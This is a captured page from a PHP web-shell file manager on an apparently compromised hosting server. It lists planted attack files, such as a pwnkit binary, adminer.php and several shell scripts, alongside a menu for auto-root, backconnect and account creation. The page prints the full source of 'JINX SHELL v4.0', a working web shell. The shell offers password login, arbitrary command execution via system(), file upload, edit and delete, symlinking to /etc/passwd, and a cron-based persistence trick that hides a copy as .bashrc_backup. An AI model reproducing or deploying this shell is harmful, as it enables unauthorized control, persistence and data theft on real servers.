Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
demo2 /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
decay_sym
[ DIR ]
drwxr-xr-x
delivery
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
sunat
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.env
984
B
-rw-r--r--
.env.example
651
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
155
B
-rw-r--r--
.htaccess
247
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
403.php
492
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
asue.php
32.72
KB
-rw-r--r--
composer.json
1.62
KB
-rw-r--r--
composer.lock
148.19
KB
-rw-r--r--
cue.php
15.89
KB
-rw-r--r--
edit.php
1.72
KB
-rw-r--r--
geck.php
68.74
KB
-r--r--r--
google9ed3e7a826404adb.html
53
B
-rw-r--r--
index2.html
274
B
-rw-r--r--
package.json
1022
B
-rw-r--r--
phpunit.xml
1.11
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.md
3.59
KB
-rw-r--r--
robots.txt
31
B
-rw-r--r--
seven_2024.sql
62.01
KB
-rw-r--r--
seven_master_2024-CALCULO.zip
33.21
MB
-rw-r--r--
w.php
445.45
KB
-rw-r--r--
webpack.mix.js
549
B
-rw-r--r--
x.php
9.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cue.php
<?php /* * JINX SHELL v4.0 - CUSTOM REQUEST * AUTO FILE VIEW + CLICKABLE PATH + CUSTOM BACKUP * MADE WITH HATE BY JINX */ session_start(); error_reporting(0); @ini_set('display_errors', 0); // CONFIG $auth_pass = md5('jinx123'); // Password: jinx123 $current_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd(); @chdir($current_dir); // LOGIN CHECK if(!isset($_SESSION['auth'])) { if(isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) { $_SESSION['auth'] = true; } else { echo '<!DOCTYPE html><html><head><title>Login</title><style>body{background:#000;color:#0f0;font-family:monospace;margin:100px auto;width:300px;}</style></head><body>'; echo '<form method="post"><input type="password" name="pass" placeholder="Password" style="width:100%;padding:10px;"><br>'; echo '<input type="submit" value="Login" style="width:100%;padding:10px;background:#f00;color:white;margin-top:10px;"></form>'; echo '</body></html>'; exit; } } // FUNCTION: GET BREADCRUMB PATH function getBreadcrumb($path) { $parts = explode('/', trim($path, '/')); $breadcrumb = '<a href="?dir=/">/</a> '; $current_path = ''; foreach($parts as $i => $part) { if(empty($part)) continue; $current_path .= '/' . $part; $breadcrumb .= ' / <a href="?dir=' . urlencode($current_path) . '">' . htmlspecialchars($part) . '</a>'; } return $breadcrumb; } // FUNCTION: LIST FILES WITH ICONS function listFilesWithActions($dir) { $files = @scandir($dir); if(!$files) return "Cannot read directory"; $html = '<table width="100%" cellspacing="0" cellpadding="5" style="background:#222;color:#0f0;border:1px solid #333;">'; $html .= '<tr style="background:#333;"><th>Name</th><th>Size</th><th>Permission</th><th>Modified</th><th>Actions</th></tr>'; // Go Up link (if not root) if($dir != '/' && $dir != '') { $parent = dirname($dir); $html .= '<tr>'; $html .= '<td colspan="5"><a href="?dir=' . urlencode($parent) . '" style="color:#0ff;">⬆️ [UP] Parent Directory</a></td>'; $html .= '</tr>'; } foreach($files as $file) { if($file == '.') continue; $fullpath = $dir . '/' . $file; $is_dir = @is_dir($fullpath); // Skip .. in root if($file == '..' && $dir == '/') continue; $size = $is_dir ? 'DIR' : (@filesize($fullpath) ?: '0') . ' bytes'; $perms = @fileperms($fullpath) ? substr(sprintf('%o', @fileperms($fullpath)), -4) : '????'; $modified = @filemtime($fullpath) ? date('Y-m-d H:i', @filemtime($fullpath)) : 'Unknown'; $html .= '<tr>'; // Name with icon $html .= '<td>'; if($file == '..') { $html .= '⬆️ <a href="?dir=' . urlencode(dirname($dir)) . '">' . htmlspecialchars($file) . '</a>'; } elseif($is_dir) { $html .= '📁 <a href="?dir=' . urlencode($fullpath) . '">' . htmlspecialchars($file) . '</a>'; } else { $html .= '📄 ' . htmlspecialchars($file); } $html .= '</td>'; // Other columns $html .= '<td>' . $size . '</td>'; $html .= '<td>' . $perms . '</td>'; $html .= '<td>' . $modified . '</td>'; // Actions $html .= '<td nowrap>'; if($file != '..') { if(!$is_dir) { $html .= '<a href="?dir=' . urlencode($dir) . '&view=' . urlencode($file) . '">👁️</a> '; $html .= '<a href="?dir=' . urlencode($dir) . '&edit=' . urlencode($file) . '">✏️</a> '; $html .= '<a href="?dir=' . urlencode($dir) . '&rename=' . urlencode($file) . '">📝</a> '; $html .= '<a href="?dir=' . urlencode($dir) . '&chmod=' . urlencode($file) . '">🔧</a> '; $html .= '<a href="?dir=' . urlencode($dir) . '&delete=' . urlencode($file) . '" onclick="return confirm(\'Delete?\')">🗑️</a> '; $html .= '<a href="?dir=' . urlencode($dir) . '&download=' . urlencode($file) . '">⬇️</a>'; } else { $html .= '<a href="?dir=' . urlencode($dir) . '&chmod=' . urlencode($file) . '">🔧</a> '; $html .= '<a href="?dir=' . urlencode($dir) . '&rename=' . urlencode($file) . '">📝</a> '; $html .= '<a href="?dir=' . urlencode($dir) . '&delete=' . urlencode($file) . '" onclick="return confirm(\'Delete folder?\')">🗑️</a>'; } } $html .= '</td>'; $html .= '</tr>'; } $html .= '</table>'; return $html; } // FUNCTION: SETUP CUSTOM BACKUP function setupCustomBackup($backup_path, $backup_name) { $shell_path = __FILE__; $backup_file = rtrim($backup_path, '/') . '/' . $backup_name; // Create directory if needed @mkdir(dirname($backup_file), 0755, true); // Create backup @copy($shell_path, $backup_file); @chmod($backup_file, 0644); // Generate cron command $cron_cmd = "(crontab -l 2>/dev/null; echo "* * * * * /bin/cp -f ' . escapeshellarg($backup_file) . ' ' . escapeshellarg($target_shell_path) . ' 2>/dev/null") | crontab -"; return [ 'backup_file' => $backup_file, 'cron_command' => $cron_cmd, 'status' => 'READY - Add cron command manually' ]; } // HANDLE BACKUP SETUP if(isset($_POST['setup_backup'])) { $_SESSION['backup_info'] = setupCustomBackup( $_POST['backup_path'], $_POST['backup_name'] ); } // HANDLE FILE OPERATIONS $action_message = ''; // View file if(isset($_GET['view'])) { $file = $_GET['view']; $action_message = '<div style="background:#000;padding:10px;margin:10px 0;border:1px solid #0f0;">'; $action_message .= '<h3>👁️ View: ' . htmlspecialchars($file) . '</h3>'; $action_message .= '<pre style="overflow:auto;max-height:400px;">' . htmlspecialchars(@file_get_contents($file)) . '</pre>'; $action_message .= '</div>'; } // Edit file if(isset($_GET['edit'])) { $file = $_GET['edit']; $content = @file_get_contents($file); $action_message = '<div style="background:#000;padding:10px;margin:10px 0;border:1px solid #0ff;">'; $action_message .= '<h3>✏️ Edit: ' . htmlspecialchars($file) . '</h3>'; $action_message .= '<form method="post">'; $action_message .= '<input type="hidden" name="edit_file" value="' . htmlspecialchars($file) . '">'; $action_message .= '<textarea name="content" rows="20" style="width:100%;">' . htmlspecialchars($content) . '</textarea><br>'; $action_message .= '<input type="submit" value="💾 Save">'; $action_message .= '</form>'; $action_message .= '</div>'; if(isset($_POST['edit_file']) && $_POST['edit_file'] == $file) { @file_put_contents($file, $_POST['content']); $action_message .= '<p style="color:#0f0;">✓ File saved!</p>'; } } // Rename if(isset($_GET['rename'])) { $file = $_GET['rename']; $action_message = '<div style="background:#000;padding:10px;margin:10px 0;border:1px solid #ff0;">'; $action_message .= '<h3>📝 Rename: ' . htmlspecialchars($file) . '</h3>'; $action_message .= '<form method="post">'; $action_message .= '<input type="hidden" name="rename_old" value="' . htmlspecialchars($file) . '">'; $action_message .= 'New Name: <input type="text" name="rename_new" value="' . htmlspecialchars($file) . '"><br>'; $action_message .= '<input type="submit" value="Rename">'; $action_message .= '</form>'; $action_message .= '</div>'; if(isset($_POST['rename_old'])) { $new_name = dirname($file) . '/' . $_POST['rename_new']; if(@rename($file, $new_name)) { $action_message .= '<p style="color:#0f0;">✓ Renamed to: ' . htmlspecialchars($_POST['rename_new']) . '</p>'; echo '<meta http-equiv="refresh" content="1;url=?dir=' . urlencode($current_dir) . '">'; } } } // Chmod if(isset($_GET['chmod'])) { $file = $_GET['chmod']; $current_perm = substr(sprintf('%o', @fileperms($file)), -4); $action_message = '<div style="background:#000;padding:10px;margin:10px 0;border:1px solid #0af;">'; $action_message .= '<h3>🔧 Change Permission: ' . htmlspecialchars(basename($file)) . '</h3>'; $action_message .= '<form method="post">'; $action_message .= '<input type="hidden" name="chmod_file" value="' . htmlspecialchars($file) . '">'; $action_message .= 'Current: ' . $current_perm . '<br>'; $action_message .= 'New (ex: 0755): <input type="text" name="chmod_perm" value="' . $current_perm . '"><br>'; $action_message .= '<input type="submit" value="Change">'; $action_message .= '</form>'; $action_message .= '</div>'; if(isset($_POST['chmod_file'])) { @chmod($_POST['chmod_file'], octdec($_POST['chmod_perm'])); $action_message .= '<p style="color:#0f0;">✓ Permission changed!</p>'; } } // Delete if(isset($_GET['delete'])) { $file = $_GET['delete']; if(@is_dir($file)) { @system('rm -rf ' . escapeshellarg($file)); } else { @unlink($file); } echo '<meta http-equiv="refresh" content="0;url=?dir=' . urlencode($current_dir) . '">'; exit; } // Download if(isset($_GET['download'])) { $file = $_GET['download']; header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); @readfile($file); exit; } // OUTPUT HTML echo '<!DOCTYPE html><html><head><title>JINX SHELL v4.0</title>'; echo '<style>'; echo 'body{font-family:monospace;background:#111;color:#0f0;margin:20px;}'; echo 'a{color:#0ff;text-decoration:none;}'; echo 'input,textarea,select{background:#222;color:#0f0;border:1px solid #0f0;padding:5px;}'; echo '.menu{background:#1a1a1a;padding:10px;margin:10px 0;}'; echo '.path{background:#000;padding:10px;margin:10px 0;border:1px solid #333;}'; echo '.backup-form{background:#1a1a1a;padding:15px;margin:10px 0;border:2px solid #f00;}'; echo '.action-box{background:#000;padding:10px;margin:10px 0;border:1px solid #0f0;}'; echo '</style>'; echo '</head><body>'; echo '<h1>🖤 JINX SHELL v4.0</h1>'; // PATH BREADCRUMB echo '<div class="path">'; echo '<strong>📁 Path:</strong> ' . getBreadcrumb($current_dir); echo '</div>'; // BACKUP SETUP FORM if(!isset($_SESSION['backup_info'])) { echo '<div class="backup-form">'; echo '<h3>⚙️ Setup Anti-Delete Backup</h3>'; echo '<form method="post">'; echo '<p>Backup Location: <input type="text" name="backup_path" value="/home/' . get_current_user() . '/.config/" style="width:100%"></p>'; echo '<p>Backup Name (hidden): <input type="text" name="backup_name" value=".bashrc_backup" style="width:100%"></p>'; echo '<p><input type="submit" name="setup_backup" value="🛡️ Generate Backup Setup" style="background:#f00;color:white;padding:10px;"></p>'; echo '</form>'; echo '</div>'; } else { echo '<div class="backup-form">'; echo '<h3>🛡️ Anti-Delete Ready</h3>'; echo '<p><strong>Backup File:</strong> ' . htmlspecialchars($_SESSION['backup_info']['backup_file']) . '</p>'; echo '<p><strong>Cron Command:</strong></p>'; echo '<code style="background:#000;padding:5px;display:block;">' . htmlspecialchars($_SESSION['backup_info']['cron_command']) . '</code>'; echo '<p>Add this command to crontab for auto-restore!</p>'; echo '</div>'; } // ACTION MESSAGE if(!empty($action_message)) { echo $action_message; } // QUICK MENU echo '<div class="menu">'; echo '<a href="?dir=' . urlencode($current_dir) . '&action=upload">📤 Upload</a>'; echo '<a href="?dir=' . urlencode($current_dir) . '&action=newfile">📄 New File</a>'; echo '<a href="?dir=' . urlencode($current_dir) . '&action=newfolder">📁 New Folder</a>'; echo '<a href="?dir=' . urlencode($current_dir) . '&action=terminal">💻 Terminal</a>'; echo '<a href="?dir=' . urlencode($current_dir) . '&action=symlink">🔗 Symlink</a>'; echo '<a href="?logout" style="color:#f00;">🚪 Logout</a>'; echo '</div>'; // HANDLE QUICK ACTIONS if(isset($_GET['action'])) { switch($_GET['action']) { case 'upload': echo '<div class="action-box">'; echo '<h3>📤 Upload File</h3>'; echo '<form method="post" enctype="multipart/form-data">'; echo '<input type="file" name="file">'; echo '<input type="submit" name="upload" value="Upload">'; echo '</form>'; if(isset($_FILES['file'])) { $target = $current_dir . '/' . basename($_FILES['file']['name']); if(@move_uploaded_file($_FILES['file']['tmp_name'], $target)) { echo '<p style="color:#0f0;">✓ Uploaded: ' . htmlspecialchars(basename($target)) . '</p>'; } } echo '</div>'; break; case 'newfile': echo '<div class="action-box">'; echo '<h3>📄 Create New File</h3>'; echo '<form method="post">'; echo 'Filename: <input type="text" name="filename"><br>'; echo 'Content: <textarea name="content" rows="5" style="width:100%"></textarea><br>'; echo '<input type="submit" name="create" value="Create">'; echo '</form>'; if(isset($_POST['create'])) { $file = $current_dir . '/' . $_POST['filename']; @file_put_contents($file, $_POST['content']); echo '<p style="color:#0f0;">✓ File created!</p>'; } echo '</div>'; break; case 'newfolder': echo '<div class="action-box">'; echo '<h3>📁 Create New Folder</h3>'; echo '<form method="post">'; echo 'Folder Name: <input type="text" name="foldername"><br>'; echo '<input type="submit" name="create" value="Create">'; echo '</form>'; if(isset($_POST['create'])) { $folder = $current_dir . '/' . $_POST['foldername']; @mkdir($folder, 0755); echo '<p style="color:#0f0;">✓ Folder created!</p>'; } echo '</div>'; break; case 'terminal': echo '<div class="action-box">'; echo '<h3>💻 Terminal</h3>'; echo '<form method="post">'; echo '<input type="text" name="cmd" placeholder="Command" style="width:80%">'; echo '<input type="submit" value="Execute">'; echo '</form>'; if(isset($_POST['cmd'])) { echo '<pre style="background:#000;padding:10px;overflow:auto;">'; @system($_POST['cmd']); echo '</pre>'; } echo '</div>'; break; case 'symlink': echo '<div class="action-box">'; echo '<h3>🔗 Create Symlink</h3>'; echo '<form method="post">'; echo 'Target: <input type="text" name="target" placeholder="/etc/passwd"><br>'; echo 'Link Name: <input type="text" name="linkname" placeholder="passwd_link"><br>'; echo '<input type="submit" name="create" value="Create">'; echo '</form>'; if(isset($_POST['create'])) { @symlink($_POST['target'], $current_dir . '/' . $_POST['linkname']); echo '<p style="color:#0f0;">✓ Symlink created!</p>'; } echo '</div>'; break; } } // AUTO FILE LISTING (ALWAYS SHOW) echo '<h3>📂 Directory Contents</h3>'; echo listFilesWithActions($current_dir); // LOGOUT HANDLER if(isset($_GET['logout'])) { session_destroy(); echo '<meta http-equiv="refresh" content="0;url=?">'; exit; } echo '<div style="text-align:center;margin-top:20px;color:#666;font-size:12px;">'; echo '🖤 JINX SHELL v4.0 | Clickable Path | Auto File View | Custom Backup'; echo '</div>'; echo '</body></html>'; ?>
Close